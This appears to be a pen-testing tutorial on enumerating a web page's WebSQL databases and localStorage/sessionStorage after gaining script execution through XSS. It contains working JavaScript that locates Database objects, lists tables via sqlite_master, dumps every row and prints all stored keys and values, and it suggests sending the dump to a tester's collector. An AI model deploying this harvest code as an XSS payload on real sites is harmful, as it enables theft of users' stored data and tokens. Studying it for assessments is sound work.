HTML5 introduces two important client-side data stores: WebSQL and Web Storage. Both are governed by public specifications (WebSQL only ever reached a W3C working draft and has since been removed from current browsers, so what follows applies to older WebKit/Blink-based clients and legacy applications). Both stores are accessed through JavaScript APIs. Even once we obtain script execution in the page's DOM (for example through XSS), we are still blind: the application's WebSQL table names and storage keys are unknown to us. Here is a way to enumerate that data during pen-testing and assessments.
Blind WebSQL Enumeration
We need the following information to extract the target content:
1. The database object
2. The table structure created on SQLite
3. The user table on which we need to run the select query
Here is a script which can harvest the database with zero prior knowledge:
var dbo;
var table;
var usertable;
for (var i in window) {
  var obj;
  try {
    obj = window[i];
    // step a: the only runtime fingerprint we have is the constructor name
    if (obj && obj.constructor && obj.constructor.name == "Database") {
      dbo = obj;
      dbo.transaction(function(tx) {
        // step b: sqlite_master lists every table in this SQLite-backed database
        tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [],
          function(tx, results) {
            table = results;
            // step c: index 0 is WebKit's own bookkeeping table; the application's table follows it.
            // The check lives here because executeSql is asynchronous.
            if (table.rows.length > 1)
              usertable = table.rows.item(1).name;
          }, null);
      });
    }
  } catch (ex) {} // some window properties (cross-origin frames) throw on access; skip them
}
a.) We run through all properties of window and keep the object whose constructor is "Database".
b.) We make a SELECT query directly against the sqlite_master table, which lists every table in that database.
c.) We grab the table at index 1; index 0 is WebKit's internal bookkeeping table (__WebKitDatabaseInfoTable__), not application data. The check sits inside the executeSql callback because the query is asynchronous; testing the result before the callback fires would read an unset variable.
We now have the actual table name residing in WebSQL for this application. Using the same database object, we can run a SELECT query against that table from the script and loop through the result rows. Hence the script can be embedded in a payload during testing to fetch the data remotely.
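The whole procedure carried through, as an added example that is not code from the original post: the three steps above refactored into reusable functions, followed by the SELECT over every user table that the text describes. Because WebSQL only exists inside a browser, the block ends with a constructed stand-in for the Database object (the Database constructor, its transaction/executeSql stub, fakeWindow and the sample rows are all assumptions made for this example); in a real page you would call dumpAllDatabases(window, callback) instead.

```javascript
// Added example, not part of the original post. Blind WebSQL harvest as reusable functions,
// plus a constructed stand-in for the WebSQL API so the logic can be exercised outside a browser.

var WEBKIT_META_TABLE = '__WebKitDatabaseInfoTable__'; // bookkeeping table WebKit keeps in every WebSQL db

// Step a: walk an object's properties and collect every value whose constructor is Database.
function findDatabases(root) {
  var found = [];
  for (var name in root) {
    try {
      var obj = root[name];
      if (obj && obj.constructor && obj.constructor.name === 'Database') found.push(obj);
    } catch (e) { /* some window properties (cross-origin frames) throw on access; skip them */ }
  }
  return found;
}

// Step b: ask sqlite_master for table names; step c: drop WebKit's own bookkeeping table.
function listUserTables(db, done) {
  db.transaction(function (tx) {
    tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [], function (tx, results) {
      var names = [];
      for (var i = 0; i < results.rows.length; i++) {
        var n = results.rows.item(i).name;
        if (n !== WEBKIT_META_TABLE) names.push(n);
      }
      done(names);
    }, function () { done([]); });
  });
}

// Dump every row of one table. SQL cannot bind an identifier as a parameter, so the table name is
// quoted and interpolated; it came from sqlite_master, not from user input.
function dumpTable(db, table, done) {
  db.transaction(function (tx) {
    tx.executeSql('SELECT * FROM "' + table.replace(/"/g, '""') + '"', [], function (tx, results) {
      var rows = [];
      for (var i = 0; i < results.rows.length; i++) rows.push(results.rows.item(i));
      done(rows);
    }, function () { done([]); });
  });
}

// Whole procedure: {tableName: [row, ...]} for every user table of every Database found under root.
function dumpAllDatabases(root, done) {
  var dbs = findDatabases(root);
  var out = {};
  var pending = dbs.length;
  if (!pending) return done(out);
  dbs.forEach(function (db) {
    listUserTables(db, function (tables) {
      var left = tables.length;
      if (!left && --pending === 0) return done(out);
      tables.forEach(function (t) {
        dumpTable(db, t, function (rows) {
          out[t] = rows;
          if (--left === 0 && --pending === 0) done(out);
        });
      });
    });
  });
}

// ---- Constructed stand-in for the browser's WebSQL objects (assumption, not a real API) ----
function Database(tables) { this.tables = tables; }   // constructor.name === 'Database', like the real one
Database.prototype.transaction = function (fn) {
  var tables = this.tables;
  fn({ executeSql: function (sql, args, ok) {
    var rows;
    if (/sqlite_master/.test(sql)) rows = Object.keys(tables).map(function (n) { return { name: n }; });
    else rows = tables[sql.match(/FROM "([^"]+)"/)[1]] || [];
    ok(this, { rows: { length: rows.length, item: function (i) { return rows[i]; } } });
  } });
};

// Constructed sample standing in for window: one unrelated object and one WebSQL database.
var fakeWindow = {
  document: {},
  appDb: new Database({
    '__WebKitDatabaseInfoTable__': [{ key: 'version', value: '1.0' }],
    'users': [{ id: 1, email: 'alice@example.test', token: 'tok-1' },
              { id: 2, email: 'bob@example.test',   token: 'tok-2' }]
  })
};

// Runs the harvest over the sample; synchronous only because the stub calls back synchronously.
function harvestSample() {
  var result;
  dumpAllDatabases(fakeWindow, function (r) { result = r; });
  return result;
}

console.log(JSON.stringify(harvestSample(), null, 2));
```

In a real browser the callbacks fire later, so anything that consumes the dump (for example a fetch to a collector you control during the test) belongs inside the done callback, exactly as the check on the table name does in the script above.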
Blind Storage Enumeration
Storage enumeration is relatively easy. We check the length of the localStorage or sessionStorage object and, if it is not zero, loop over the entries and read every value. Iterate by index with key(i) rather than for...in: stored keys are own properties of the Storage object, but for...in can also walk the enumerable methods on the Storage prototype (getItem, setItem and so on). We can use the following code for localStorage and sessionStorage.
function dumpStorage(store) {
  if (store.length) {
    console.log(store.length);
    for (var n = 0; n < store.length; n++) {
      var key = store.key(n); // index-based access skips the prototype methods that for...in would visit
      console.log(key);
      console.log(store.getItem(key));
    }
  }
}
dumpStorage(localStorage);
dumpStorage(sessionStorage);
Here is the output for the call.